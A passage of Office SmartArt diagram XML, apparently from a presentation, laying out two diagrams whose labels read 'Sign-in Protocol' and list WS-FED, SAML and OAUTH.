      <dgm:prSet presAssocID="{BF4E8C81-BDD3-4516-8B59-BDC31D4BC3FC}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6599EF00-CA9D-47BA-BA89-D12AFC5CE611}" type="pres">
      <dgm:prSet presAssocID="{E7885476-4BDE-429D-89AD-0E3995FA4856}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CA354273-B74A-4291-8F6C-42D8F8BA8589}" type="pres">
      <dgm:prSet presAssocID="{E7885476-4BDE-429D-89AD-0E3995FA4856}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6F6FCECA-E3E2-4BDE-BD7E-0DD9F0DF8EB3}" type="pres">
      <dgm:prSet presAssocID="{E7885476-4BDE-429D-89AD-0E3995FA48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B4493DA-6EAF-463F-B442-E279B07E1411}" type="pres">
      <dgm:prSet presAssocID="{E7885476-4BDE-429D-89AD-0E3995FA4856}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CFEFFADF-2679-426C-B41B-DCA317CD6F9F}" type="pres">
      <dgm:prSet presAssocID="{E7885476-4BDE-429D-89AD-0E3995FA48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9E1708-B052-4262-BECA-D9B74A2CEFB5}" type="presOf" srcId="{E7885476-4BDE-429D-89AD-0E3995FA4856}" destId="{CFEFFADF-2679-426C-B41B-DCA317CD6F9F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{92309C19-D718-4236-9891-43229F5684B3}" srcId="{90A4D026-7E7A-4C3D-B0A6-713401C65A22}" destId="{512C8B68-E90E-4D0B-99A9-307EE412320F}" srcOrd="0" destOrd="0" parTransId="{367FA426-7078-4925-82C1-61CF604EED30}" sibTransId="{282F4A32-62B1-4101-B7AB-9EEC1CD14406}"/>
    <dgm:cxn modelId="{E0EF6229-A72B-43E0-AF44-49188FB8B9C2}" type="presOf" srcId="{EDD2881F-2CD8-4774-B505-63EEE0D690A8}" destId="{FE7A14DE-9CB5-49C7-BF63-237D1AC39E96}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{8AA5A940-FB0B-44A9-B0F0-E49C148743A2}" type="presOf" srcId="{90A4D026-7E7A-4C3D-B0A6-713401C65A22}" destId="{B0A808E5-21BF-436A-9EC4-9BF81EFA348B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{C5C6217D-6E2B-4C64-95A4-E60BE81E8978}" type="presOf" srcId="{512C8B68-E90E-4D0B-99A9-307EE412320F}" destId="{9CA772C1-E379-4EAB-BBBE-301298DD05A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{832596BA-32AF-4507-A5C7-C3031CA3DFC0}" srcId="{90A4D026-7E7A-4C3D-B0A6-713401C65A22}" destId="{EDD2881F-2CD8-4774-B505-63EEE0D690A8}" srcOrd="1" destOrd="0" parTransId="{C97BEFE8-C449-4040-98B9-46C86CED5719}" sibTransId="{BF4E8C81-BDD3-4516-8B59-BDC31D4BC3FC}"/>
    <dgm:cxn modelId="{8873FDFB-B023-4F7A-B4FF-42CA509E0CBB}" srcId="{90A4D026-7E7A-4C3D-B0A6-713401C65A22}" destId="{E7885476-4BDE-429D-89AD-0E3995FA4856}" srcOrd="2" destOrd="0" parTransId="{F91C5276-1D5F-4C4B-BFBD-4104845F0A1E}" sibTransId="{DCD135B6-5570-4014-9AA7-02CF24FBFE1A}"/>
    <dgm:cxn modelId="{2F0FE6F6-4D8D-4BC1-8951-12D2EA548E49}" type="presParOf" srcId="{B0A808E5-21BF-436A-9EC4-9BF81EFA348B}" destId="{2DAB7F6C-EED8-49A8-9CCB-C3A68ADE029F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{592F2C82-EAB3-4C90-8374-BE3CD8601D6B}" type="presParOf" srcId="{2DAB7F6C-EED8-49A8-9CCB-C3A68ADE029F}" destId="{65C824EA-AEB8-4566-B9C9-E50F58D7F8EF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{23564CAA-98AF-4202-9AF6-A172DC920D85}" type="presParOf" srcId="{2DAB7F6C-EED8-49A8-9CCB-C3A68ADE029F}" destId="{9CD85B49-986A-49B9-865E-BE18AE47255E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{3BB49829-FD01-4CCE-8502-29766C856B07}" type="presParOf" srcId="{2DAB7F6C-EED8-49A8-9CCB-C3A68ADE029F}" destId="{3C2D5EB3-AA24-43EC-B510-CECA7583078A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{C59296E0-9B36-4E74-B484-83BC0FE6D463}" type="presParOf" srcId="{2DAB7F6C-EED8-49A8-9CCB-C3A68ADE029F}" destId="{9CA772C1-E379-4EAB-BBBE-301298DD05A3}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{B0A2816E-4763-4C1D-9E2B-A24B189007AA}" type="presParOf" srcId="{B0A808E5-21BF-436A-9EC4-9BF81EFA348B}" destId="{E73EB6A3-F271-4B44-BEC3-F7B3434AC731}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{A50DB9F5-6C87-4FA9-AA5D-8EBC356AF719}" type="presParOf" srcId="{B0A808E5-21BF-436A-9EC4-9BF81EFA348B}" destId="{14E1C2D9-54C5-4646-B318-20576004F8FD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{7CA7FAB2-E603-4699-94AB-4284C971B7E3}" type="presParOf" srcId="{14E1C2D9-54C5-4646-B318-20576004F8FD}" destId="{FEA68064-884F-4A63-84FE-4AF4401C135F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{D15D0432-A30B-4471-B25F-1403CFC08D83}" type="presParOf" srcId="{14E1C2D9-54C5-4646-B318-20576004F8FD}" destId="{3D45FA0B-F4FA-4C18-904A-97D3C064C363}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{CE385957-9FC4-491B-809E-7EE18072E513}" type="presParOf" srcId="{14E1C2D9-54C5-4646-B318-20576004F8FD}" destId="{4D42F55E-2DC0-4842-A863-B994A8A49B71}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{BD27E5CB-D43E-46CB-9151-910CC63B1B0E}" type="presParOf" srcId="{14E1C2D9-54C5-4646-B318-20576004F8FD}" destId="{FE7A14DE-9CB5-49C7-BF63-237D1AC39E96}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{72025C00-E52D-44D6-ACC6-407245EB6194}" type="presParOf" srcId="{B0A808E5-21BF-436A-9EC4-9BF81EFA348B}" destId="{A6DD221A-087B-481F-88B7-6B191D604670}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{6CC06FCB-EF1A-4B18-AFD5-5E17F0B7E5A0}" type="presParOf" srcId="{B0A808E5-21BF-436A-9EC4-9BF81EFA348B}" destId="{6599EF00-CA9D-47BA-BA89-D12AFC5CE611}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{7A090D81-CCD8-4A0F-991C-BA61D37BDE2E}" type="presParOf" srcId="{6599EF00-CA9D-47BA-BA89-D12AFC5CE611}" destId="{CA354273-B74A-4291-8F6C-42D8F8BA8589}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{D2D7AEA5-733A-45F8-93E3-5BD6BB1F8119}" type="presParOf" srcId="{6599EF00-CA9D-47BA-BA89-D12AFC5CE611}" destId="{6F6FCECA-E3E2-4BDE-BD7E-0DD9F0DF8EB3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{7C9A96AC-10F5-48BB-850C-69D87D8E1DD1}" type="presParOf" srcId="{6599EF00-CA9D-47BA-BA89-D12AFC5CE611}" destId="{BB4493DA-6EAF-463F-B442-E279B07E1411}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{767D9177-53A1-4416-B80D-C429F0A9DB66}" type="presParOf" srcId="{6599EF00-CA9D-47BA-BA89-D12AFC5CE611}" destId="{CFEFFADF-2679-426C-B41B-DCA317CD6F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4D026-7E7A-4C3D-B0A6-713401C65A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2C8B68-E90E-4D0B-99A9-307EE412320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300" dirty="0"/>
            <a:t>Sign-in Protocol</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{367FA426-7078-4925-82C1-61CF604EED30}" type="parTrans" cxnId="{92309C19-D718-4236-9891-43229F5684B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{282F4A32-62B1-4101-B7AB-9EEC1CD14406}" type="sibTrans" cxnId="{92309C19-D718-4236-9891-43229F5684B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1D1BAE5-371E-46DC-BF9A-D5C5983960AC}" type="pres">
      <dgm:prSet presAssocID="{90A4D026-7E7A-4C3D-B0A6-713401C65A22}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FE894C1E-20B3-4B47-AFCD-F07FFE4C8830}" type="pres">
      <dgm:prSet presAssocID="{512C8B68-E90E-4D0B-99A9-307EE412320F}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{215EB074-00A2-4CE5-87FD-F09449E92678}" type="pres">
      <dgm:prSet presAssocID="{512C8B68-E90E-4D0B-99A9-307EE412320F}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2EE55352-A157-4124-81A3-9D3E60D36413}" type="pres">
      <dgm:prSet presAssocID="{512C8B68-E90E-4D0B-99A9-307EE412320F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8C12F0FD-9411-4178-BFF8-2BC32CC65172}" type="pres">
      <dgm:prSet presAssocID="{512C8B68-E90E-4D0B-99A9-307EE412320F}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{21CC4EB1-DA81-4804-8D2B-C465F8DA3E97}" type="pres">
      <dgm:prSet presAssocID="{512C8B68-E90E-4D0B-99A9-307EE412320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92309C19-D718-4236-9891-43229F5684B3}" srcId="{90A4D026-7E7A-4C3D-B0A6-713401C65A22}" destId="{512C8B68-E90E-4D0B-99A9-307EE412320F}" srcOrd="0" destOrd="0" parTransId="{367FA426-7078-4925-82C1-61CF604EED30}" sibTransId="{282F4A32-62B1-4101-B7AB-9EEC1CD14406}"/>
    <dgm:cxn modelId="{E9548F8D-A94B-4183-94C8-86F7E8064EF7}" type="presOf" srcId="{512C8B68-E90E-4D0B-99A9-307EE412320F}" destId="{21CC4EB1-DA81-4804-8D2B-C465F8DA3E97}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{DC74B7A3-040F-4B3F-98BD-F1435C1A38F1}" type="presOf" srcId="{90A4D026-7E7A-4C3D-B0A6-713401C65A22}" destId="{C1D1BAE5-371E-46DC-BF9A-D5C5983960AC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{C30AA83E-722F-4112-AB58-45FE6D121915}" type="presParOf" srcId="{C1D1BAE5-371E-46DC-BF9A-D5C5983960AC}" destId="{FE894C1E-20B3-4B47-AFCD-F07FFE4C8830}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{CCB9E67A-F597-4E6C-975C-E01C98B6DB3B}" type="presParOf" srcId="{FE894C1E-20B3-4B47-AFCD-F07FFE4C8830}" destId="{215EB074-00A2-4CE5-87FD-F09449E92678}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{89B7113E-7807-48B7-813D-B2FB1B0AC576}" type="presParOf" srcId="{FE894C1E-20B3-4B47-AFCD-F07FFE4C8830}" destId="{2EE55352-A157-4124-81A3-9D3E60D36413}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{0511D9B8-3B9D-4822-9F3B-A237248E1318}" type="presParOf" srcId="{FE894C1E-20B3-4B47-AFCD-F07FFE4C8830}" destId="{8C12F0FD-9411-4178-BFF8-2BC32CC65172}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{4F043613-FFE3-4652-81E1-F37078EC949C}" type="presParOf" srcId="{FE894C1E-20B3-4B47-AFCD-F07FFE4C8830}" destId="{21CC4EB1-DA81-4804-8D2B-C465F8DA3E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CF31DA-4F8E-4158-BD57-980AD0B295D1}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurv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E0A022E-F501-4D6A-B7F8-EEC24211088A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WS-FED</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05447DF4-13E6-41CA-8376-111805CF6B1B}" type="parTrans" cxnId="{3816EB92-F560-44EF-AC8B-A6F931E628A3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{067A5571-4130-4BA7-B061-824B4495CC44}" type="sibTrans" cxnId="{3816EB92-F560-44EF-AC8B-A6F931E628A3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926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SAML</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{77FFDF12-22E2-4221-BBB5-60CD46104CD8}" type="parTrans" cxnId="{74A69CBD-6EDA-4066-9FFF-B08ADD9FC5E2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{867069EF-CB44-4707-913B-47915FE8DA7D}" type="sibTrans" cxnId="{74A69CBD-6EDA-4066-9FFF-B08ADD9FC5E2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF28327A-6ACE-4196-8AE3-021E145010A4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OAUTH</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{054304F5-792B-43C1-9A1C-CD3738E01A37}" type="parTrans" cxnId="{253F2F7F-0759-4AB0-93D3-2082B93777AC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{331B79E0-CCDC-4F80-9E64-196A1C9A1FB7}" type="sibTrans" cxnId="{253F2F7F-0759-4AB0-93D3-2082B93777AC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E5C78D93-DDDC-4A54-9267-F4EB7D4DA907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…</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FEBCE4CD-23AF-4615-9C87-AD7ECF74A4E9}" type="parTrans" cxnId="{45E18049-BCC8-4087-864F-24664C30D74C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69490E35-53D7-4B75-AB00-983B4533893C}" type="sibTrans" cxnId="{45E18049-BCC8-4087-864F-24664C30D74C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED3A9C8E-1AD8-4500-A6B7-D52AF893A4D8}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:chPref val="7"/>
          <dgm:dir/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="Name1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="cycle" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E7EC2769-A2BA-4F11-875A-D1A7149F2AC2}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="srcNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{235A759C-FF99-46A0-B7B2-9BA78096698A}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="conn" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{280FC3BE-935D-4F5F-896B-F73344EF1531}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="extraNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C48355B-3174-46B3-A1F1-80C3E7BCDBD9}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="dstNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A87BAE4B-8178-46A0-97C0-DA467EE38F19}" type="pres">
      <dgm:prSet presAssocID="{AE0A022E-F501-4D6A-B7F8-EEC24211088A}" presName="text_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{70E988FA-2FDD-42B0-B69D-774BF113A4E2}" type="pres">
      <dgm:prSet presAssocID="{AE0A022E-F501-4D6A-B7F8-EEC24211088A}" presName="accent_1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B69DCF54-2D9D-4535-9929-670416E84C0E}" type="pres">
      <dgm:prSet presAssocID="{AE0A022E-F501-4D6A-B7F8-EEC24211088A}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5952D4BF-A371-43F1-BD47-FA648C912FD1}" type="pres">
      <dgm:prSet presAssocID="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}" presName="text_2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{398F3DFF-9018-4516-B4CF-E50479A8A558}" type="pres">
      <dgm:prSet presAssocID="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}" presName="accent_2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A8FED190-5BAE-42D3-AB70-CCD3653FDC0E}" type="pres">
      <dgm:prSet presAssocID="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{857F507D-12BB-42FA-A84E-AE57235F61F1}" type="pres">
      <dgm:prSet presAssocID="{CF28327A-6ACE-4196-8AE3-021E145010A4}" presName="text_3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4A90D28B-1D3F-4D78-8726-F754FEB6ACCD}" type="pres">
      <dgm:prSet presAssocID="{CF28327A-6ACE-4196-8AE3-021E145010A4}" presName="accent_3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A1C1BBB6-DD01-43EF-8B51-3677343800A5}" type="pres">
      <dgm:prSet presAssocID="{CF28327A-6ACE-4196-8AE3-021E145010A4}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{70DAA8A7-7676-41BA-88B5-2ED6FE864CCA}" type="pres">
      <dgm:prSet presAssocID="{E5C78D93-DDDC-4A54-9267-F4EB7D4DA907}" presName="text_4" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E11B724C-D087-4C6F-99A4-78661B1DEC6E}" type="pres">
      <dgm:prSet presAssocID="{E5C78D93-DDDC-4A54-9267-F4EB7D4DA907}" presName="accent_4" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8F5CCB78-D749-4F80-8312-407E61B052D4}" type="pres">
      <dgm:prSet presAssocID="{E5C78D93-DDDC-4A54-9267-F4EB7D4DA907}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{52C2CF12-9FCB-4BAC-9675-9221FC39C4BB}" type="presOf" srcId="{E5C78D93-DDDC-4A54-9267-F4EB7D4DA907}" destId="{70DAA8A7-7676-41BA-88B5-2ED6FE864CCA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{9CF97C38-B07A-4C5A-A319-37B425DB70B6}" type="presOf" srcId="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" destId="{ED3A9C8E-1AD8-4500-A6B7-D52AF893A4D8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{24646A5D-3F16-4058-85FD-A63CE0A7C22E}" type="presOf" srcId="{067A5571-4130-4BA7-B061-824B4495CC44}" destId="{235A759C-FF99-46A0-B7B2-9BA78096698A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{45E18049-BCC8-4087-864F-24664C30D74C}" srcId="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" destId="{E5C78D93-DDDC-4A54-9267-F4EB7D4DA907}" srcOrd="3" destOrd="0" parTransId="{FEBCE4CD-23AF-4615-9C87-AD7ECF74A4E9}" sibTransId="{69490E35-53D7-4B75-AB00-983B4533893C}"/>
    <dgm:cxn modelId="{253F2F7F-0759-4AB0-93D3-2082B93777AC}" srcId="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" destId="{CF28327A-6ACE-4196-8AE3-021E145010A4}" srcOrd="2" destOrd="0" parTransId="{054304F5-792B-43C1-9A1C-CD3738E01A37}" sibTransId="{331B79E0-CCDC-4F80-9E64-196A1C9A1FB7}"/>
    <dgm:cxn modelId="{D01F2288-571C-4EF7-BFDD-E2F0F92E2EEC}" type="presOf" srcId="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}" destId="{5952D4BF-A371-43F1-BD47-FA648C912FD1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{3816EB92-F560-44EF-AC8B-A6F931E628A3}" srcId="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" destId="{AE0A022E-F501-4D6A-B7F8-EEC24211088A}" srcOrd="0" destOrd="0" parTransId="{05447DF4-13E6-41CA-8376-111805CF6B1B}" sibTransId="{067A5571-4130-4BA7-B061-824B4495CC44}"/>
    <dgm:cxn modelId="{28A482A6-D408-4069-983D-8A983C7F57C3}" type="presOf" srcId="{AE0A022E-F501-4D6A-B7F8-EEC24211088A}" destId="{A87BAE4B-8178-46A0-97C0-DA467EE38F19}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{74A69CBD-6EDA-4066-9FFF-B08ADD9FC5E2}" srcId="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" destId="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}" srcOrd="1" destOrd="0" parTransId="{77FFDF12-22E2-4221-BBB5-60CD46104CD8}" sibTransId="{867069EF-CB44-4707-913B-47915FE8DA7D}"/>
    <dgm:cxn modelId="{F806EAF7-5978-4880-9BAA-41090E2C7E41}" type="presOf" srcId="{CF28327A-6ACE-4196-8AE3-021E145010A4}" destId="{857F507D-12BB-42FA-A84E-AE57235F61F1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{72702396-5385-40FC-91C5-A487FBF98250}" type="presParOf" srcId="{ED3A9C8E-1AD8-4500-A6B7-D52AF893A4D8}" destId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{23D55643-6371-4111-8CF4-4ECFCEDA808E}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{B614338A-5084-4451-A503-6F455F7A9B74}" type="presParOf" srcId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" destId="{E7EC2769-A2BA-4F11-875A-D1A7149F2AC2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
